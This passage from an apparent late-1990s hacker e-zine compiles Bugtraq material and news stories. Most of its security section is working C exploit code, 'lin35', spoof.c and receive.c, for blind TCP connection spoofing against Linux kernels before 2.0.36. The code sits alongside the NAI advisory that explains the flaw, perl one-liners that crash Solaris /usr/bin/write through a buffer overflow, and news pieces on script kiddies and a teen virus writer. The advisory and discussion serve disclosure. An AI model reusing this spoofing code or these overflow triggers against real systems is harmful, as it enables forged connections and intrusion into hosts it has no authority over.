gcc -o lin35 lin35.c -lnet -D_BSD_SOURCE=1 */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/time.h> #include <libnet.h> int main(int argc, char **argv) { u_long dip = 0; u_long sip = 0; u_short dp = 0; u_short sp = 0; u_long seq; u_char *buf, *fbuf; int c, s, fp; unsigned long int fs; printf("lin35 - linux < 2.0.35 spoofer by sc!\n"); if (argc != 7) { printf("usage: %s shost sport dhost dport delay file\n", argv[0]); printf(" shost = source host (name or ip)\n"); printf(" sport = source port\n"); printf(" dhost = destination host\n"); printf(" dport = destination port\n"); printf(" delay = time to wait (in ms) between SYN and data and FIN\n"); printf(" file = filename to read data from\n"); exit(0); } sip = name_resolve(argv[1], 1); sp = atoi(argv[2]); dip = name_resolve(argv[3], 1); dp = atoi(argv[4]); fp = open(argv[6], O_RDONLY); if (fp == -1) { fprintf(stderr, "file not found\n"); exit(1); } fs = lseek(fp, 0, SEEK_END); if (fs == -1) { fprintf(stderr, "file end not found\n"); exit(1); } if (lseek(fp, 0, SEEK_SET) == -1) { fprintf(stderr, "cannot reset offset\n"); exit(1); } printf("[35] data file: %s - file size: %u\n", argv[6], fs); if (fs > (MAX_PACKET - (IP_H + TCP_H))) { fprintf(stderr, "file too big, exiting\n"); exit(1); } fbuf = malloc(fs); if (fbuf == NULL) { fprintf(stderr, "cannot load file to mem\n"); exit(1); } c = read(fp, fbuf, fs); if (c != fs) { fprintf(stderr, "cannot read file\n"); exit(1); } buf = calloc(1, TCP_H + IP_H); if (buf == NULL) { fprintf(stderr, "no memory for packet\n"); exit(1); } s = open_raw_sock(IPPROTO_RAW); if (s == -1) { fprintf(stderr, "cannot open raw socket\n"); exit(1); } seq = get_prand(PRu32); /* first initiate a connection */ printf("[35] opening connection, sending SYN\n"); build_ip(TCP_H, 0, get_prand(PRu16), 0, get_prand(PR8), IPPROTO_TCP, sip, dip, NULL, 0, buf); build_tcp(sp, dp, seq, 0, TH_SYN, 16384, 0, NULL, 0, buf + IP_H); do_checksum(buf, IPPROTO_TCP, TCP_H); c = write_ip(s, buf, TCP_H + IP_H); if (c < TCP_H + IP_H) { fprintf(stderr, "send to less bytes\n"); exit(1); } /* now wait to let the connection establish */ usleep(atoi(argv[5]) * 1000); /* then send data packet */ printf("[35] sending data packet (%u bytes of data)\n", fs); buf = realloc(buf, TCP_H + IP_H + fs); if (buf == NULL) { fprintf(stderr, "memory\n"); exit(1); } build_ip(TCP_H, 0, get_prand(PRu16), 0, get_prand(PR8), IPPROTO_TCP, sip, dip, NULL, 0, buf); build_tcp(sp, dp, seq + 1, 0, 0, 16384, 0, fbuf, fs, buf + IP_H); do_checksum(buf, IPPROTO_TCP, TCP_H); c = write_ip(s, buf, TCP_H + IP_H + fs); if (c < (TCP_H + IP_H + fs)) { fprintf(stderr, "send to less bytes (%d) for data packet\n", c); exit(1); } /* now wait again */ usleep(atoi(argv[5]) * 1000); /* and close the connection */ printf("[35] closing connection, sending FIN\n"); build_ip(TCP_H, 0, get_prand(PRu16), 0, get_prand(PR8), IPPROTO_TCP, sip, dip, NULL, 0, buf); build_tcp(sp, dp, seq + 1 + fs, 0, TH_FIN, 16384, 0, NULL, 0, buf + IP_H); do_checksum(buf, IPPROTO_TCP, TCP_H); c = write_ip(s, buf, TCP_H + IP_H); if (c < TCP_H + IP_H) { fprintf(stderr, "send to less bytes\n"); exit(1); } printf("[35] successful\n"); free(fbuf); free(buf); return(0); } @HWA 05.1 TCP Blind Spoofing Exploit Code for Linux kernels 2.0.35< and Discussion ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -=- receive.c and spoof.c exploit code Hello, Here is some demonstration code for the "Linux Blind TCP Spoofing" problem discovered by Network Associates, Inc. If you have trouble compiling this, try it with -D_BSD_SOURCE. 1.) receive.c This simple program creates a TCP socket and waits for a connection. After the accept call returnes, it reads 8 bytes from the socket and prints them on stdout. usage: receive listen_port 2.) spoof.c This one sends a SYN packet, a Null packet (no flags at all) with 8 bytes of data and a FIN packet to the target. usage: spoof source_ip source_port target_ip target_port Don't forget to disable host source_ip so it cannot send RST's. I've tested this on Linux 2.0.30. After the FIN packet is received, the accept call returnes and the read call gives the data sent with the Null packet. !!This code is for educational purposes only!! ---------------------------- receive.c -------------------------- #include <stdio.h> #include <errno.h> #include <sys/socket.h> #include <unistd.h> #include <stdlib.h> #include <netinet/in.h> main(int argc, char *argv[]) { int i,n,dummy,new; struct sockaddr_in address,source_addr; char buffer[8]; address.sin_family = AF_INET; address.sin_port = htons(atoi(argv[1])); address.sin_addr.s_addr = 0; if((i=socket(AF_INET,SOCK_STREAM,6))<0) /*create socket*/ { perror("socket\n"); exit(1); } if((bind(i,(struct sockaddr *)&address,sizeof(struct sockaddr_in)))<0) { /*bind socket to address*/ perror("bind"); exit(1); } if((listen(i,2))<0) { perror("listen"); exit(1); } printf("listening on socket\n"); new=accept(i,(struct sockaddr *)&source_addr,&dummy); if(new>0) printf("connected!\n"); else { perror("accept"); exit(1); } fflush(stdout); n=read(new,buffer,8); printf("read %i bytes from socket\n",n); printf("message is: %s\n",buffer); } --------------------------------spoof.c--------------------------------- #include <stdio.h> #include <netinet/ip.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netinet/tcp.h> #include <stdlib.h> #include <errno.h> #include <sys/types.h> #include <asm/types.h> #define FIN 1 #define SYN 2 #define SEQ 20985 /*---------------Checksum calculation--------------------------------*/ unsigned short in_cksum(unsigned short *addr,int len) { register int nleft = len; register unsigned short *w = addr; register int sum = 0; unsigned short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } /*----------------------------------------------------------------------*/ /*------------Send spoofed TCP packet-----------------------------------*/ int send_tcp(int sfd,unsigned int src,unsigned short src_p, unsigned int dst,unsigned short dst_p,tcp_seq seq,tcp_seq ack, u_char flags,char *buffer,int len) { struct iphdr ip_head; struct tcphdr tcp_head; struct sockaddr_in target; char packet[2048]; /*the exploitation of this is left as an exercise..*/ int i; struct tcp_pseudo /*the tcp pseudo header*/ { __u32 src_addr; __u32 dst_addr; __u8 dummy; __u8 proto; __u16 length; } pseudohead; struct help_checksum /*struct for checksum calculation*/ { struct tcp_pseudo pshd; struct tcphdr tcphd; char tcpdata[1024]; } tcp_chk_construct; /*Prepare IP header*/ ip_head.ihl = 5; /*headerlength with no options*/ ip_head.version = 4; ip_head.tos = 0; ip_head.tot_len = htons(sizeof(struct iphdr)+sizeof(struct tcphdr)+len); ip_head.id = htons(31337 + (rand()%100)); ip_head.frag_off = 0; ip_head.ttl = 255; ip_head.protocol = IPPROTO_TCP; ip_head.check = 0; /*Fill in later*/ ip_head.saddr = src; ip_head.daddr = dst; ip_head.check = in_cksum((unsigned short *)&ip_head,sizeof(struct iphdr)); /*Prepare TCP header*/ tcp_head.th_sport = htons(src_p); tcp_head.th_dport = htons(dst_p); tcp_head.th_seq = htonl(seq); tcp_head.th_ack = htonl(ack); tcp_head.th_x2 = 0; tcp_head.th_off = 5; tcp_head.th_flags = flags; tcp_head.th_win = htons(0x7c00); tcp_head.th_sum = 0; /*Fill in later*/ tcp_head.th_urp = 0; /*Assemble structure for checksum calculation and calculate checksum*/ pseudohead.src_addr=ip_head.saddr; pseudohead.dst_addr=ip_head.daddr; pseudohead.dummy=0; pseudohead.proto=ip_head.protocol; pseudohead.length=htons(sizeof(struct tcphdr)+len); tcp_chk_construct.pshd=pseudohead; tcp_chk_construct.tcphd=tcp_head; memcpy(tcp_chk_construct.tcpdata,buffer,len); tcp_head.th_sum=in_cksum((unsigned short *)&tcp_chk_construct, sizeof(struct tcp_pseudo)+sizeof(struct tcphdr)+len); /*Assemble packet*/ memcpy(packet,(char *)&ip_head,sizeof(ip_head)); memcpy(packet+sizeof(ip_head),(char *)&tcp_head,sizeof(tcp_head)); memcpy(packet+sizeof(ip_head)+sizeof(tcp_head),buffer,len); /*Send packet*/ target.sin_family = AF_INET; target.sin_addr.s_addr= ip_head.daddr; target.sin_port = tcp_head.th_dport; i=sendto(sfd,packet,sizeof(struct iphdr)+sizeof(struct tcphdr)+len,0, (struct sockaddr *)&target,sizeof(struct sockaddr_in)); if(i<0) return(-1); /*Error*/ else return(i); /*Return number of bytes sent*/ } /*---------------------------------------------------------------------*/ main(int argc, char *argv[]) { int i; unsigned int source,target; unsigned short int s_port,d_port; char data[]="abcdefg"; source=inet_addr(argv[1]); s_port=atoi(argv[2]); target=inet_addr(argv[3]); d_port=atoi(argv[4]); if((i=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) /*open sending socket*/ { perror("socket"); exit(1); } send_tcp(i,source,s_port,target,d_port,SEQ,0,SYN,NULL,0); printf("SYN sent\n"); usleep(1000); send_tcp(i,source,s_port,target,d_port,SEQ+1,0,0,data,8); /*no flags set*/ printf("data sent\n"); usleep(1000); send_tcp(i,source,s_port,target,d_port,SEQ+9,0,FIN,NULL,0); printf("FIN sent\n"); close(i); } -- Jochen Bauer Institute for Theoretical Physics University of Stuttgart Germany PGP public key available from: http://www.theo2.physik.uni-stuttgart.de/jtb.html -=- further discussion; Date: Tue, 9 Mar 1999 16:28:24 -0800 From: Security Research Labs <seclabs@NAI.COM> To: BUGTRAQ@netspace.org Subject: Linux Blind TCP Spoofing [ The following text is in the "iso-8859-1" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ====================================================================== = Network Associates, Inc. SECURITY ADVISORY March 9, 1999 Linux Blind TCP Spoofing ====================================================================== = SYNOPSIS An implementation flaw in the Linux TCP/IP stack allows remote attackers to forge TCP connections without predicting sequence numbers and pass data to the application layer before a connection is established. ====================================================================== = VULNERABLE HOSTS This problem is present in Linux kernels up to and including 2.0.35. Any distribution containing a kernel revision less than this is vulnerable. ====================================================================== = DETAILS TCP is a reliable connection-oriented protocol which requires the completion of a three way handshake to establish a connection. To implement reliable and unduplicated delivery of data, the TCP protocol uses a sequence based acknowledgment system. During connection establishment each host selects an initial sequence number which is sent in the first packet of the connection. Each subsequent byte transmitted in the TCP connection is assigned a sequence number. To prevent duplicate or invalid segments from impacting established connections TCP utilizes a state based model. In a typical client-server application, the client initiates a connection by transmitting a TCP segment to a listening server process. This causes the state of the process to move from the LISTEN state into SYN_RECEIVE if a SYN flag is present. During this state the server acknowledges the clients request setting both the SYN and ACK flags. To complete the three way handshake the client acknowledges the servers response, moving the server from SYN_RECEIVE to ESTABLISHED state. To establish a forged TCP session an attacker must have knowledge of or be able to predict the initial sequence number that is selected by the server. An implementation flaw in the Linux kernel allows data to be delivered to the application layer before the handshake has completed. ====================================================================== = TECHNICAL DETAILS The combination of three flaws in the Linux TCP/IP implementation contribute to the existence of a security vulnerability. Firstly, Linux only verifies the acknowledgment number of incoming segments if the ACK flag has been set. Linux also queues data from TCP segments without acknowledgment information prior to the completion of the three way handshake but after the initial SYN has been acknowledged by the server. Finally, Linux passes data to the application layer upon the receipt of a packet containing the FIN flag regardless of whether a connection has been established. Together, these flaws allow an attacker to spoof an arbitrary connection and deliver data to an application without the need to predict the servers initial sequence number. According to the standard, there is only one case wherein a correct TCP/IP stack can accept data in a packet that does not have the ACK flag set --- the initial connection-soliciting SYN packet can contain data, but must not have the ACK flag set. In any other case, a data packet not bearing the ACK flag should be discarded. When a TCP segment carries an ACK flag, it must have a correct acknowledgement sequence number (which is the sequence number of the next byte of data expected from the other side of the connection). TCP packets bearing the ACK flag are verified to ensure that their acknowledgement numbers are correct. Vulnerable Linux kernels accept data segments that do not have the ACK flag set. Because the ACK flag is not set, the acknowledgement sequence number is not verified. This allows an attacker to send data over a spoofed connection without knowing the target's current (or initial) sequence number. Linux does not deliver data received from a TCP connection when the connection is in SYN_RECEIVE state. Thus, an attacker cannot successfully spoof a TCP transaction to a Linux host without somehow completing the TCP handshake. However, an implementation flaw in some Linux kernels allows an attacker to bypass the TCP handshake entirely, by "prematurely" closing it with a FIN packet. When a FIN packet is received for a connection in SYN_RECEIVE state, Linux behaves as if the connection was in ESTABLISHED state and moves the connection to CLOSE_WAIT state. In the process of doing this, data queued on the connection will be delivered to listening applications. If the ACK flag is not set on the FIN segment, the target's sequence number is not verified in the segment. ====================================================================== = RESOLUTION It is recommended that kernels below version 2.0.36 be upgraded to eliminate this vulnerability. Updated kernel packages for Red Hat Linux which are not vulnerable to this problem are available from http://www.redhat.com/support/docs/errata.html. Both Debian and Caldera Linux have been contacted regarding this vulnerability although no official response has been received. The latest stable versions of the Linux kernel are available from http://www.kernel.org. ====================================================================== = CREDITS Analysis and documentation of this problem was conducted by Anthony Osborne with the Security Labs at Network Associates. This vulnerability was discovered on the October 5, 1998. ====================================================================== = ABOUT THE NETWORK ASSOCIATES SECURITY LABS The Security Labs at Network Associates hosts some of the most important research in computer security today. With over 30 published security advisories published in the last 2 years, the Network Associates security auditing teams have been responsible for the discovery of many of the Internet's most serious security flaws. This advisory represents our ongoing commitment to provide critical information to the security community. For more information about the Security Labs at Network Associates, see our website at http://www.nai.com or contact us at <seclabs@nai.com>. ====================================================================== = NETWORK ASSOCIATES SECURITY LABS PGP KEY - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGP 5.5.5 mQGiBDXGgDsRBADVOnID6BtEhKlm2cNalho28YP0JAh+J4iRUIaiWshzI0tc0KPc fvs+0xYwiqjxmeHi2sdIEPQ7S+ltA3Dlp6/DFojWBr2XB9hfWy4uiKBUHqnsKYnB Gpkh6nIx7DIwn+u0PXMXbJCG3LYf8daiPVdzC2VFtbRvJL4wZc6NLQViFQCg/9uS DuH/0NE6mO8Cu4iVrUT5Wk8D/ArOpV5T5yIuXHZO1/ZBVeHccVVvHe8wHK4D9WUs FsB8fgYLNgdFMMjtam7QQSBY/P1KKBzaFqZhkfS4WVMAFEy94NHXG+KTCPhXkZzp OPPqwWqZgfvOg0Bm20O/GhzQkB6JfFJqcfR87Ej0+fcDKrTTxAELWHGS7c9Qdn6P bfwHA/4oLNwYrtgWNkjGcG018Pu2jKT7YuP9zBTMu28IBiWdPLGL9Wle4d5cdDVx Es4iVl8FMtxlgTWCgMnBLS4nyM3pCn1HF+8Gi+IVKUXWCkqt/rtBMsrOMfrOgEIu BWnTZcTR7kcWtH7xDFNyZ47U4pElLXwATVDty/FczAJnpeht2LQyTmV0d29yayBB c3NvY2lhdGVzIFNlY3VyaXR5IExhYnMgPHNlY2xhYnNAbmFpLmNvbT6JAEsEEBEC AAsFAjXGgDsECwMCAQAKCRCheCy6j9WBEtgDAKDpYMwQZP0Ipx7X0ivnTxxJkA/W vACg4LZv0lmWqmnd7XCe4OIJ05aT6hK5Ag0ENcaAOxAIAPZCV7cIfwgXcqK61qlC 8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh 01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscB qtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFst jvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISn CnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVeky CzsAAgIH/RZcJoRkhCf9O4Er+rciBNG3QqM3tek23oxGuVwqRxtGlGKuf+YaUDIA vZhARftupZYJf/+AM9pyjjsF7ON/Df5oIXXhqzrDySw47dNB3I1FG7vwAUBRfYgG NRP+zvf1nld+FgAXag1DIQteXYPtoMUJP8ZgvbELYVdZS2TapOHUv7r4rOY+UUjl U+FkQPp9KCNreaNux4NxwT3tzXl1KqqkliC8sYxvMCkJ+JO71TKGplO9dXsf3O8p 2r33+LngmLs4O7inrUlmAUKq3jmCK50J7RsZjd6PlK/0JwcjFkOZeYrxTguZzCR4 QYmo8nEHqEMSKQci0VUf9KH4lHf6xmGJAEYEGBECAAYFAjXGgDsACgkQoXgsuo/V gRK5LACgoAqLFk10kAMu6xb3ftO4+INJs14Ani+1hujlYRxYphN97c5ci8WtILNZ =L3C6 - ---- -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQA/AwUBNvLqq6F4LLqP1YESEQJH5QCg4FIv1+eRED+wYV5uMp2nVto/zHMAnjii g3Q3t36ITPBKkdRCQGK4DCBe =yLGh -----END PGP SIGNATURE----- -------------------------------------------------------------------------- Date: Wed, 10 Mar 1999 12:17:25 -0800 From: John D. Hardin <jhardin@WOLFENET.COM> To: BUGTRAQ@netspace.org Subject: Re: Linux Blind TCP Spoofing (fwd) ---------- Forwarded message ---------- Date: Wed, 10 Mar 1999 19:46:13 +0000 (GMT) >From: Alan Cox <alan@lxorguk.ukuu.org.uk> To: jhardin@WOLFENET.COM Subject: Re: Linux Blind TCP Spoofing > > It is recommended that kernels below version 2.0.36 be upgraded to > > eliminate this vulnerability. > > This implies but does not explicitly state that 2.0.36+ kernels are > not vulnerable. Is this the case? NAI reported the problem to me during the 2.0.36 development period and the bug was squashed. @HWA 06.0 Solaris 2.6 x86 /usr/bin/write buffer overflow exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Mon, 8 Mar 1999 15:30:36 +0900 From: bugscan@KOSNET.NET To: BUGTRAQ@netspace.org Subject: Solaris "/usr/bin/write" bug This is my first post to BugTraq If this is old, I'm sorry. when playing around with "/usr/bin/write" on Solaris 2.6 x86 , I found something interesting. It's buffer overflow bug in "/usr/bin/write" To ensure, view this command : ( Solaris 2.6 x86 ) [loveyou@/user/loveyou/buf]{30}% write loveyou `perl -e 'print "x" x 97'` [loveyou@/user/loveyou/buf]write loveyou `perl -e 'print "x" x 97'` xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxx permission denied [loveyou@/user/loveyou/buf]write loveyou `perl -e 'print "x" x 98'` Segmentation fault ( Solaris 2.5.1(2.5) sparc ) [love]/home/love> write loveyou `perl -e 'print "x" x 79'` xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx permission denied [love]/home/love> write loveyou `perl -e 'print "x" x 80'` Segmentation Fault ( Solaris 2.6 and 2.7 maybe .. ) bye bye ~ :) ---------------------------------------------------------------------------------- Date: Tue, 9 Mar 1999 17:16:26 +0000 From: John RIddoch <jr@SCMS.RGU.AC.UK> Reply-To: John Riddoch <jr@master.scms.rgu.ac.uk> To: BUGTRAQ@netspace.org Subject: Re: Solaris "/usr/bin/write" bug >when playing around with "/usr/bin/write" on Solaris 2.6 x86 , I found something > interesting. >It's buffer overflow bug in "/usr/bin/write" >To ensure, view this command : > >( Solaris 2.6 x86 ) >[loveyou@/user/loveyou/buf]{30}% write loveyou `perl -e 'print "x" x 97'` >[loveyou@/user/loveyou/buf]write loveyou `perl -e 'print "x" x 97'` >xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx >( Solaris 2.6 and 2.7 maybe .. ) This also segfaults under Solaris 2.6 and 7 on SPARC. I'm not sure how exploitable this is, as it is only sgid tty, which isn't a huge problem (but could be nonetheless, I suppose). -- John Riddoch Email: jr@scms.rgu.ac.uk Telephone: (01224)262730 Room C4, School of Computer and Mathematical Science Robert Gordon University, Aberdeen, AB25 1HG I am Homer of Borg. Resistance is Fu... Ooooh! Donuts! ---------------------------------------------------------------------------------- Date: Tue, 9 Mar 1999 21:22:17 -0600 From: Chris Tobkin <tobkin@umn.edu> To: BUGTRAQ@netspace.org Subject: Re: Solaris "/usr/bin/write" bug > ( Solaris 2.6 and 2.7 maybe .. ) (Solaris 2.7 x86) [tobkin@2.7_x86](~)9:09pm> write loveyou `perl -e 'print "x" x 93'` xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxx permission denied [tobkin@2.7_x86](~)9:09pm> write loveyou `perl -e 'print "x" x 94'` Segmentation fault (Solaris 2.6 sparc) [tobkin@2.6_sparc](~)9:12pm> write loveyou `perl -e 'print "x" x 91'` xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxx permission denied [tobkin@2.6_sparc](~)9:12pm> write loveyou `perl -e 'print "x" x 92'` Segmentation fault Looks like 2.6 for sparc and 2.7 intel have the same problem... // chris tobkin@umn.edu ************************************************************************* Chris Tobkin tobkin@umn.edu Java and Web Services - Academic and Distributed Computing Services - UMN ----------------------------------------------------------------------- Laura: I took a business course at business college-- Jim: How did that work out? Laura: Well, not very well...I had to drop out, it gave me...indigestion. - Tennessee Williams - The Glass Menagerie ************************************************************************* ---------------------------------------------------------------------------------- Date: Tue, 9 Mar 1999 15:45:16 +0000 From: Dan - Sr. Admin <dm@GLOBALSERVE.NET> To: BUGTRAQ@netspace.org Subject: Re: Solaris "/usr/bin/write" bug > This is my first post to BugTraq > If this is old, I'm sorry. > when playing around with "/usr/bin/write" on Solaris 2.6 x86 , I found something > interesting. > It's buffer overflow bug in "/usr/bin/write" > To ensure, view this command : [snip] > ( Solaris 2.6 and 2.7 maybe .. ) > > bye bye ~ :) Confirmed under Sparc Solaris 2.6. Although I have no source code to verify this, I would assume the problem lies in a sprintf() call (or something similiar) that builds the device to open from the tty you specify on the command line. However, even if this is overflowable into a shell with tty permissions, I can see nothing useful coming out of it. crw--w---- 1 dm tty 24, 0 Mar 9 14:39 pts@0:0 Those are the permissions on the terminal. The most I can see happening is someone writing to my screen when I have messages turned off. Regards, -- Dan Moschuk (TFreak!dm@globalserve.net) Senior Systems/Network Administrator Globalserve Communications Inc., a Primus Canada Company "Be different: conform." @HWA 07.0 New Computer Technology Makes Hacking a Snap - Washington Post ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ FUD throughout this article on script kiddies, but still a good entertaining read and worthy of your time ... http://www.washingtonpost.com/wp-srv/WPcap/1999-03/10/024r-031099-idx.html New Computer Technology Makes Hacking a Snap By Michael E. Ruane Washington Post Staff Writer Wednesday, March 10, 1999; Page A01 Used to be you had to have some know-how to crash a kernel. It would take all night to snoop a connection, smash a stack or crack a password. You could work forever trying to get to root. Not any more. Nowadays, any fresh-faced newbie can download a kiddie script, fire off a vulnerability scan and, in no time, come up with a nice, juicy target list. It's enough to make veteran hackers -- the handful of computer wizards who speak a colorful language that once was all their own -- break down and cry. But it's true. Along with the breathtaking advances in computer technology has come a vast proliferation of easy, ready-to-use computer hacking programs, freely available on the Internet, and a boon to greenhorn hackers. "This is your nephew or your cousin," says Peter Tippett, president of the Reston-based International Computer Security Association. "It's a kid who says, 'This seems kind of cool. Let me just take this tool and aim it at Ford Motor Company.' " They use programs -- called "exploits," "tools" or "attacks" -- with names like "Smurf," "Teardrop" and "John the Ripper." Some are so-called "denial of service" programs, which sneak or barge in and overwhelm a targeted system, shutting it down. Others are "vulnerability scanners," which search the Net for specific weaknesses to be exploited later. Still others are "penetration" attacks that break in and take control. Some attacks use a "Trojan Horse" -- benign-looking bait with an exploit concealed inside. Others "spoof," using a bogus ID. Still others lie in wait and spring when an unsuspecting victim pauses to visit. A few are simply sent out to "sniff the traffic" on the Internet. There are hundreds of them. So many that some have been given the name kiddie scripts, because of their simplicity of use. Those who launch them are called, of course, script kiddies. And experts say they may account for 95 percent of all external computer hacking attacks. Hacking always seems to have been the purview of the young. Just last year, five teenagers hacked into Defense Department computers, and last month, a 15-year-old from Vienna was accused of hacking into Clemson University's system and of trying to break into NASA's. Experts believe there are now tens of thousands of hacking-related Web sites, and hundreds that approach the subject seriously. The Pentagon, traditionally the most assailed hacking target on Earth, announced Friday that it is investigating another potent attack -- one of the 80 to 100 it undergoes every day. But in years past, hacking was tedious, demanding work that required brains and dedication, and, if successful, was an envied notch in the cyber gun. There was hacker esprit. There was a great "signal-to-noise" ratio -- intelligent talk vs. baloney. And there was the hacker code: Look, but don't touch. No longer. "It used to be a small circle," says Dr. Mudge, a veteran Boston-area hacker who operates a Web site with his sidekicks Kingpin, Brian Oblivion, SpaceRogue and others. "Now it's almost mainstream, and like anything that goes mainstream you get a lot of good and a lot of bad." "Now people can hack without having to pay their dues," says Rob Clyde, a vice president with the Rockville-based computer security firm, Axent Technologies Inc. "You no longer have to be an expert," he says. "You just have to have time and motive. And the motive often times now is vandalism, destruction, just blow away stuff, destroy it, make it look bad." Sometimes it's even worse. The FBI on Friday released an annual survey that it conducts with the San Francisco-based Computer Security Institute, reporting that criminal hacking caused $123 million in losses last year, and now posed "a growing threat to . . . the rule of law in cyberspace." Mostly, though, many experts say, the new add-water-and-stir hacking is for amateurs. And most of them are still pretty young. "We're talking 95 percent of hackers are script kiddies," Tippett says. "We're talking a million events a month where people run those tools to see what happens. Maybe one or two percent of hackers are people who know what the tool actually does." Peter Mell, a computer scientist at the National Institute of Standards and Technology, in Gaithersburg, says, "Ten years ago if you wanted to break into somebody's system, you would stay up all night long." "You would manually go to their computer, try a few things, if it didn't work you'd go to another computer, try a few things," he says. "Very tedious. You'd spend all night doing it." "Nowadays what somebody does is . . . at 6 o'clock, they download a vulnerability scanner and an associated attack. They set the vulnerability scanner running. They go out to a party . . . come home 11 at night. And their computer has compiled a list for them of 2,000 hosts on the Internet which are vulnerable to that attack." "All they have to do is type the name of the computer that is vulnerable into their attack script, and they have complete control of the enemy," he says. The actual damage done by hackers is uncertain and some experts suggested it is overstated by a computer industry eager to sell its services. Those experts estimate that 80 percent of hacking comes from within a corporation rather than through outside attacks. Hacking lingo seems filled with military references like "attack" and "target." But hacking also has -- along with its own magazines and an annual convention -- an idiom all its own. "Crashing a kernel," for example, refers to breaking down the core of an operating system. "Smashing a stack" means taking over a vital part of a computer's memory. "Snooping a connection" means breaking into a conversation between two other computers. And the ultimate feat, "getting to root," or more simply, "getting root," means seizing fundamental control of target system. Mell, 26, a surgeon's son from St. Louis who said his brother taught him to program in second grade, has conducted a study of published attacks that smash, crash, seize and snoop by monitoring what people request at hacker Web sites. He has named the array of published attacks the Global Attack Toolkit. And he has compiled a list of the top 20 recently most popular. He points out that most attacks can be defended with so called "patches," but a few are almost indefensible. One of the most popular -- number 2 on his list -- and one that's tough to counter is "Smurf." "It's an attack where you overwhelm an enemy system with a huge number of (information) packets . . . and their computer simply can't handle all of the packets," he says. "The computer shuts down. If it's a Web site, the Web site stops working. If it's the router going into the White House, the White House traffic stops flowing." Number one on his list was a Trojan Horse called "Back Orifice." In a paper he wrote last year, Mell mentioned one hacker Web site that lists 690 scripts, another that has 383 and another that lists 556. "Together, the exploit script Web sites form an attack tool kit that is available to literally everyone in the world," he wrote. "Somewhere on the Internet, there exists a host vulnerable to almost every attack, and scanning tools are readily available to find that host." Mell says the attack scripts are posted on hacker Web sites by other hackers, by disgruntled systems administrators trying to draw attention, and eventually patches, to holes in their systems, and by "white hat" hackers seeking to alert the computer security industry to vulnerabilities. And he believes that posting easy scripts may not be all bad. "When attacks are posted to the Internet, companies respond, and they fix their software very quickly, and they release patches, and there's news articles and advisories alerting people that there's this vulnerability," he says. "So by the public posting . . . in a way it makes the world safer, because everybody knows what's out there and they're prepared," he says. "If the scripts weren't published, intrusion-detection companies wouldn't know where to get their data, security companies wouldn't know that their applications had holes in them." "At the same time that these attack scripts make it available for anyone in the world with very little intelligence to download and run attacks, it also means that security companies are quick on their feet to respond to them." But computer security firms are not sitting idly by. They have their own intrusion detection programs -- some of which are recon missions, if you will, that "sniff" the traffic to ambush roving attack scripts. Mell says there is a "Virtual Suicide" Web site where systems operators can request an attack to test security. Visitors can ask to be "crippled," "beheaded" or "vaporized." Perhaps the most sinister attacks, though, are passive. Apparently small in number, Mell says in his report, they "require a target to visit the hacker's Web site" before striking. Soon, he writes, "the Internet may develop 'bad parts of town.'" "Watch where you walk!" ⌐ Copyright 1999 The Washington Post Company @HWA 08.0 "Super Hacker Apprehended" ~~~~~~~~~~~~~~~~~~~~~~~~~~ Seen initially on Help Net Security's site the article is printed here below; KOREAN "SUPERHACKER" BUSTED by deepcase, Tuesday 9th Mar 1999 on 1:05 pm CET Kim, a 15 year old high school student from Korea got busted by the police after after 152 people complained about the "super viruses" that he distributed by email. Kim told police that he mailed the viruses to demonstrate his talents and to find out if anyone could break them. The viruses were so complex that they were virtually impossible to kill. The spokesman said that Kim was known as a computer genius from the 7th grade, when he learned to handle the machine code language assembly 3. The spokesman added "Kim is one of just forty to fifty people in Korea with such a talent" . A National Police Officier said that Kim could have became a "national treasure" in the information society of the future and that he will guide Kim along the legal path of computer work. Referenced url: http://www.chosun.com/w21data/html/news/199903/199903050334.html Super Hacker Apprehended A police spokesman announced Friday that officers had apprehended a super hacker who turned out to be a fifteen year old high school boy named Kim. To date 152 people have filed complaints about the 15 super viruses Kim created and e-mailed, but police expect the final figure to be over 2,000. Kim told police that he mailed the viruses to demonstrate his talents and to find out if anyone could develop a 'vaccine' for them. The viruses were so complex that they were virtually impossible to kill. The spokesman said that Kim was known as a computer genius from the 7th grade, when he learned to handle the machine code language 'assembly 3'. one of just forty to fifty people 